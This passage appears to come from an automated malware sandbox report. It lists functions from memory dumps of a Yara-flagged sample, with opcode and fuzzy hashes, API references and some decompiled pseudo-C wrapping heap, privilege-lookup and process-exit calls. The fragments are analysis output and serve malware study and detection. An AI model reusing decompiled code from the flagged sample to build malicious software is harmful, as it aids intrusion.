                                                                • Instruction Fuzzy Hash: AD900261692100424250717988449064045BBE1351B51C132A0D88560D85998865A6A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c27ff4403a1302c6e401e0f1c66c98d3674d9b1926f243e054bc6044ebcbbf8b
                                                                • Instruction ID: f19ad2d9ef6815a71627b6cc099d104f98a613d1e03f1de1b7963041283c3f8b
                                                                • Opcode Fuzzy Hash: c27ff4403a1302c6e401e0f1c66c98d3674d9b1926f243e054bc6044ebcbbf8b
                                                                • Instruction Fuzzy Hash: 409002612A290042D31065794C14B07004597D0343F51C126A0544564CC9558861A561
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 44fda55a4629ad89fa37dc431cdafbc6cb4f4935caef1e58952657087e85a7ba
                                                                • Instruction ID: eb2da9a0463acc51aad855ce175f78ccd7cf0c1f7a2380643d247b58a3c3db07
                                                                • Opcode Fuzzy Hash: 44fda55a4629ad89fa37dc431cdafbc6cb4f4935caef1e58952657087e85a7ba
                                                                • Instruction Fuzzy Hash: 989002A129310003421571694414616404A97E0341F51C032E14045A0DC5658891B165
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e8b48e10d813f1ec8e2959230a07f28341244ae7fe86ed085fe91eb5b2542893
                                                                • Instruction ID: 1a70af27353fd4dbb1487cbc2f4b76982f5639fa2b8e07ef47cc76591891b5b6
                                                                • Opcode Fuzzy Hash: e8b48e10d813f1ec8e2959230a07f28341244ae7fe86ed085fe91eb5b2542893
                                                                • Instruction Fuzzy Hash: 729002652A2100030215A5690704507008697D5391751C032F1405560CD6618861A161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 70df68f575b78f2ad150b12307f0aa630844638a3e83da6cf38730102be987e2
                                                                • Instruction ID: 75bed4971b641c4b52753de4cc757521d41d48349771f1150cc972df67ee00f6
                                                                • Opcode Fuzzy Hash: 70df68f575b78f2ad150b12307f0aa630844638a3e83da6cf38730102be987e2
                                                                • Instruction Fuzzy Hash: AA90027129218802D2206169840474A004597D0341F55C422A4814668D86D58891B161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 7da34e60933dd27105e8dfb7162499eab0fd15622d051f4927bd46bfe09ec68e
                                                                • Instruction ID: b307213b92dd28b5a3f02d1345ef8d08481d15dfa66d8332b486dbe625d76f82
                                                                • Opcode Fuzzy Hash: 7da34e60933dd27105e8dfb7162499eab0fd15622d051f4927bd46bfe09ec68e
                                                                • Instruction Fuzzy Hash: B990027129210802D2907169440464A004597D1341F91C026A0415664DCA558A59B7E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: fe41f85e9513c34f8f4d08bb54337d96e1a82714fbe351f80d0ea1755d932be1
                                                                • Instruction ID: 6812f045e0e67eca8b47ca5e391c849a611a34f2ab707cc78590a39132efee68
                                                                • Opcode Fuzzy Hash: fe41f85e9513c34f8f4d08bb54337d96e1a82714fbe351f80d0ea1755d932be1
                                                                • Instruction Fuzzy Hash: C59002692A310002D2907169540860A004597D1342F91D426A0405568CC9558869A361
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9f15ca926f2d14078d73f76bcc540940c9b5408bb46294e0e5bcb6fda8cf78e7
                                                                • Instruction ID: 7b0cc4a7a22849618deecd33757cd0b4ccc4fa2c73be14438b72a859b8755779
                                                                • Opcode Fuzzy Hash: 9f15ca926f2d14078d73f76bcc540940c9b5408bb46294e0e5bcb6fda8cf78e7
                                                                • Instruction Fuzzy Hash: 9590026139210003D250716954186064045E7E1341F51D022E0804564CD9558856A262
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: d7d38bcd43f3ba02ea8d5d0b2c189a61b2738c40112228fa7ec54848adfcf96f
                                                                • Instruction ID: b33524910cea5c07a2a039ecb478529a1a6510e3856eadecd6ec00b4ca8ad2e2
                                                                • Opcode Fuzzy Hash: d7d38bcd43f3ba02ea8d5d0b2c189a61b2738c40112228fa7ec54848adfcf96f
                                                                • Instruction Fuzzy Hash: F69002713A224402D22061698404706004597D1341F51C422A0C14568D86D58891B162
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 897c31945e33b93472b387cf207a2b55ad0bb3a547218744ec776fa985daba1a
                                                                • Instruction ID: 1408ccad8acb223d345abb27089182bb7f47697bb2928c6bed2a273ff33fd2ce
                                                                • Opcode Fuzzy Hash: 897c31945e33b93472b387cf207a2b55ad0bb3a547218744ec776fa985daba1a
                                                                • Instruction Fuzzy Hash: 2190027129210402D21065A95408646004597E0341F51D022A5414565EC6A58891B171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                                • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                                                                • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                                                • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004188D4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 34%
                                                                			E004188D4(void* __eax, void* __ecx, void* __edx, void* __eflags, void* _a4, long _a8, void* _a12) {
				char _v0;
				void* __esi;
				void* __ebp;
				void* _t10;

				_push(ss);
				if(__eflags < 0) {
					_push(__eax);
					_t10 = RtlAllocateHeap(__ecx); // executed
					return _t10;
				} else {
					__eflags = __eax & 0x7bf3ee02;
					__ch = __ch + __dh;
					asm("repe jnp 0x4f");
					__ch = __ch | __ah;
					asm("in al, 0x55");
					__ebp = __esp;
					__eax = _v0;
					__ecx =  *((intOrPtr*)(__eax + 0x10));
					_t5 = __eax + 0xc74; // 0xc74
					__esi = _t5;
					__eax = _a8;
					__ecx = _a4;
					__eax = RtlFreeHeap(_a4, _a8, _a12); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                                                0x004188d4
                                                                0x004188d5
                                                                0x004188cb
                                                                0x004188cd
                                                                0x004188d1
                                                                0x004188d7
                                                                0x004188d7
                                                                0x004188d8
                                                                0x004188da
                                                                0x004188dd
                                                                0x004188df
                                                                0x004188e1
                                                                0x004188e3
                                                                0x004188e6
                                                                0x004188ef
                                                                0x004188ef
                                                                0x004188ff
                                                                0x00418902
                                                                0x0041890d
                                                                0x0041890f
                                                                0x00418910
                                                                0x00418911
                                                                0x00418911

                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateFree
                                                                • String ID: &5A
                                                                • API String ID: 2488874121-1617645808
                                                                • Opcode ID: fcbf945e6328ea6c1887eb20fc2a2a2567de23908ff0df483301d651e10bb6be
                                                                • Instruction ID: 6282274ab587063e124e8f6f94d4621d7c1d3b2a4779aafc1cb1d89d7c11a588
                                                                • Opcode Fuzzy Hash: fcbf945e6328ea6c1887eb20fc2a2a2567de23908ff0df483301d651e10bb6be
                                                                • Instruction Fuzzy Hash: FBF08CB52002086BD714EFA9EC89EE777ADEF88390F218559FD085B201C631E8408AF0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 40%
                                                                			E004188A0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t6 =  &_a8; // 0x413526
				_t12 =  *_t6;
				_push(_a16);
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}







                                                                0x004188b7
                                                                0x004188bf
                                                                0x004188c2
                                                                0x004188c2
                                                                0x004188c8
                                                                0x004188cb
                                                                0x004188cd
                                                                0x004188d1

                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID: &5A
                                                                • API String ID: 1279760036-1617645808
                                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041894D, Relevance: 3.0, APIs: 2, Instructions: 41memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 64%
                                                                			E0041894D(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t11;
				void* _t20;

				asm("repe jnp 0x4f");
				asm("in al, 0x55");
				_t8 = _a4;
				_t3 = _t8 + 0xc74; // 0xc74
				E004191D0(_t20, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}





                                                                0x004188da
                                                                0x004188df
                                                                0x004188e3
                                                                0x004188ef
                                                                0x004188f7
                                                                0x0041890d
                                                                0x00418911

                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitFreeHeapProcess
                                                                • String ID:
                                                                • API String ID: 1180424539-0
                                                                • Opcode ID: 638e98ca48876dcc6a2d4b4a75ca26f72c87f61d2700b5f618fbd2a0a80bd2e4
                                                                • Instruction ID: ac497d262b34783e26b3ca760390965de9d836cbddb32587618383f770ce6fb2
                                                                • Opcode Fuzzy Hash: 638e98ca48876dcc6a2d4b4a75ca26f72c87f61d2700b5f618fbd2a0a80bd2e4
                                                                • Instruction Fuzzy Hash: 2EF0AFB12042047FD714DF64CC49FE73BA89F48350F144949FD595B242C531E911CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 22%
                                                                			E00407280(signed char* __edx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				signed char* _t19;
				long _t22;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;

				_t19 = __edx;
				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				E0041AD10(_t19,  &_v68, 3);
				_t25 = _a4 + 0x1c;
				_t12 = E00409B30(_t25, _t25,  &_v68); // executed
				_push(0xc4e7b6d6);
				asm("les ebp, [edx]");
				_push(0);
				_push(_t12);
				_push(_t25);
				_t13 = E00413E40();
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t34 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409290(_t34, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                                                0x00407280
                                                                0x0040728f
                                                                0x00407293
                                                                0x0040729e
                                                                0x004072aa
                                                                0x004072ae
                                                                0x004072b3
                                                                0x004072b7
                                                                0x004072ba
                                                                0x004072bc
                                                                0x004072bd
                                                                0x004072be
                                                                0x004072c3
                                                                0x004072ca
                                                                0x004072cd
                                                                0x004072da
                                                                0x004072dc
                                                                0x004072de
                                                                0x004072fb
                                                                0x004072fb
                                                                0x00000000
                                                                0x004072fd
                                                                0x00407302

                                                                APIs
                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID:
                                                                • API String ID: 1836367815-0
                                                                • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
                                                                • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
                                                                • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00407253, Relevance: 1.5, APIs: 1, Instructions: 47threadwindowCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 37%
                                                                			E00407253(void* __eax, void* __eflags) {
				void* _t18;

				_push(0x6f40cf1a);
				asm("into");
				_t18 = __eax;
				if (__eflags <= 0) goto L3;
			}




                                                                0x00407258
                                                                0x0040725d
                                                                0x0040725e
                                                                0x0040725f

                                                                APIs
                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID:
                                                                • API String ID: 1836367815-0
                                                                • Opcode ID: ae089018b483cc5af5b97608564573cf562c8fbf42ff24fac65e517310ac558a
                                                                • Instruction ID: 19d6fb42efd6647f46ad17cc43e22d3cbf2539516a199e1ba29fc6e9581c60b3
                                                                • Opcode Fuzzy Hash: ae089018b483cc5af5b97608564573cf562c8fbf42ff24fac65e517310ac558a
                                                                • Instruction Fuzzy Hash: 2FF0F672B8021936E62165556C03FFE73589B40B51F1900BFFF04FB2C2FAA9AD4642E6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                0x004188ef
                                                                0x004188f7
                                                                0x0041890d
                                                                0x00418911

                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                0x00418a5a
                                                                0x00418a70
                                                                0x00418a74

                                                                APIs
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LookupPrivilegeValue
                                                                • String ID:
                                                                • API String ID: 3899507212-0
                                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00418912, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 50%
                                                                			E00418912() {
				int _v0;
				intOrPtr _v4;
				void* _t13;

				asm("pushad");
				_push(ss);
				_t6 = _v4;
				E004191D0(_t13, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
				ExitProcess(_v0);
			}






                                                                0x0041891a
                                                                0x0041891d
                                                                0x00418923
                                                                0x0041893a
                                                                0x00418948

                                                                APIs
                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0
                                                                • Opcode ID: 22990e755b6d3975cbc62fea768f659959c1af4a0dcbfb079f9ec8e994eb6656
                                                                • Instruction ID: c07516c4409d34d008ef245c5732bf97bb28f4cd06172ad6fb42449ff2e4143d
                                                                • Opcode Fuzzy Hash: 22990e755b6d3975cbc62fea768f659959c1af4a0dcbfb079f9ec8e994eb6656
                                                                • Instruction Fuzzy Hash: CFE04FB4610305BFD734DF64CC9AFD33BA99B096A0F048698B95927292D670EB50C7A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                0x00418923
                                                                0x0041893a
                                                                0x00418948

                                                                APIs
                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0
                                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e74b186840056885a8884cf2522bde0636fd1f0cfbbc329ca63093a62de2b6ee
                                                                • Instruction ID: 670f4596a36be63256475e0d2727aaead81a2ed69a2fef409952ffb56d10a31e
                                                                • Opcode Fuzzy Hash: e74b186840056885a8884cf2522bde0636fd1f0cfbbc329ca63093a62de2b6ee
                                                                • Instruction Fuzzy Hash: B3B09B71D425C5C6D711D770470CB17794477D0745F16C066D1420655A4778C491F6B6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 00406AB4, Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 45cd188c90423a8ff0df6b6357dcb7c11e8f8b457759b234f3c04948392e3dec
                                                                • Instruction ID: f8514cecbd4cc92bbf1bbe748015c6f87ef303c5aa5e8e30fe36f7e12e7b5e25
                                                                • Opcode Fuzzy Hash: 45cd188c90423a8ff0df6b6357dcb7c11e8f8b457759b234f3c04948392e3dec
                                                                • Instruction Fuzzy Hash: 98C01232A551158AD3300D1DA8A01B5F7B4A79A624F10677AD808EB991CB56D407518C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C98A0, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f24d8faf6501d4e17df910faee185e0c396e55d9e189ed6cac2c6dd66df9e859
                                                                • Instruction ID: de485e6bc43c1ad2892c1c7a17d6d1cef2f44d7ee6a9eb327f7f376bf538c443
                                                                • Opcode Fuzzy Hash: f24d8faf6501d4e17df910faee185e0c396e55d9e189ed6cac2c6dd66df9e859
                                                                • Instruction Fuzzy Hash: B090026139210402D212616944146060049D7D1385F91C023E1814565D86658953F172
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9820, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b468f3be87347af4f60c25fbe68df928cab8a105f2c97125998d022d8f6afb8
                                                                • Instruction ID: 5bbaea51186ac9209a13738aedcf2fe5d9df9926a458b62012fd86d82c1bab47
                                                                • Opcode Fuzzy Hash: 1b468f3be87347af4f60c25fbe68df928cab8a105f2c97125998d022d8f6afb8
                                                                • Instruction Fuzzy Hash: AB9002712D210402D251716944046060049A7D0381F91C023A0814564E86958A56FAA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009CB040, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 996a526de7dd22baddc28a0bc142a0bda2c91b70cf5130497ef4fbe83d850ce3
                                                                • Instruction ID: 2cf03d666def44384bb23898f8a885dc72d89479188e92ddab8635518ff1d46c
                                                                • Opcode Fuzzy Hash: 996a526de7dd22baddc28a0bc142a0bda2c91b70cf5130497ef4fbe83d850ce3
                                                                • Instruction Fuzzy Hash: 979002A1692240434650B16948044065055A7E1341791C132A0844570C86A88855E2A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C99D0, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3eff804325eac3b73d0e7285b738b919b1435493ede1fc0e7fe3de625d8d8a5f
                                                                • Instruction ID: 12e6a27a3549bb4f3645fc60039281bbc53fdad17bb9c9e9776e01f31c487c6f
